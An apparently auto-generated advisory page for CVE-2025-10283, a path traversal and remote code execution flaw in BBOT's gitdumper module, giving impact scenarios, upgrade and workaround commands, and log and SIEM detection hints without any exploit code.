CVE-2025-10283
📋 TL;DR
CVE-2025-10283 is a path traversal vulnerability in BBOT's gitdumper module that allows remote code execution when processing malicious git repositories. Attackers can execute arbitrary commands on systems running vulnerable BBOT instances. This affects security professionals and organizations using BBOT for reconnaissance.
💻 Affected Systems
- BBOT (Black Lantern Offensive Toolkit)
⚠️ Manual Verification Required
This CVE does not have specific version information in our database, so automatic vulnerability detection cannot determine if your system is affected.
Why? The CVE database entry doesn't specify which versions are vulnerable (no version ranges provided by the vendor/NVD).
🔒 Custom verification scripts are available for registered users. Sign up free to download automated test scripts.
- Review the CVE details at NVD
- Check vendor security advisories for your specific version
- Test if the vulnerability is exploitable in your environment
- Consider updating to the latest version as a precaution
⚠️ Risk & Real-World Impact
Worst Case
Full system compromise with attacker gaining complete control over the BBOT host, enabling lateral movement, data exfiltration, and persistent access.
Likely Case
Remote code execution leading to reconnaissance tool compromise, credential theft, and potential pivot to internal networks.
If Mitigated
Limited impact with proper network segmentation and restricted execution environments, potentially only affecting the BBOT instance.
🎯 Exploit Status
Exploitation requires tricking BBOT to process a malicious git repository, which can be done through various reconnaissance scenarios.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: Latest version after advisory publication
Vendor Advisory: https://blog.blacklanternsecurity.com/p/bbot-security-advisory-gitdumper
Restart Required: No
Instructions:
1. Update BBOT to latest version using pip: pip install --upgrade bbot
2. Verify gitdumper module has been patched
3. Review any custom configurations using gitdumper
🔧 Temporary Workarounds
Disable gitdumper module
allTemporarily disable the vulnerable gitdumper module to prevent exploitation
bbot --disable-modules gitdumper
Restrict git repository sources
allOnly allow BBOT to process git repositories from trusted sources
🧯 If You Can't Patch
- Isolate BBOT instances in restricted network segments with no internet access
- Run BBOT in containerized environments with minimal privileges and read-only filesystems
🔍 How to Verify
Check if Vulnerable:
Check if BBOT version is older than the patched version and if gitdumper module is enabledCheck Version:
bbot --versionVerify Fix Applied:
Verify BBOT version is updated and test gitdumper with known safe repositories📡 Detection & Monitoring
Log Indicators:
- Unusual git repository processing patterns
- Suspicious command execution from BBOT processes
- Path traversal attempts in git operations
Network Indicators:
- BBOT instances downloading git repositories from untrusted sources
- Unexpected outbound connections from BBOT hosts
SIEM Query:
process_name:"bbot" AND (command_line:"gitdumper" OR command_line:"git clone")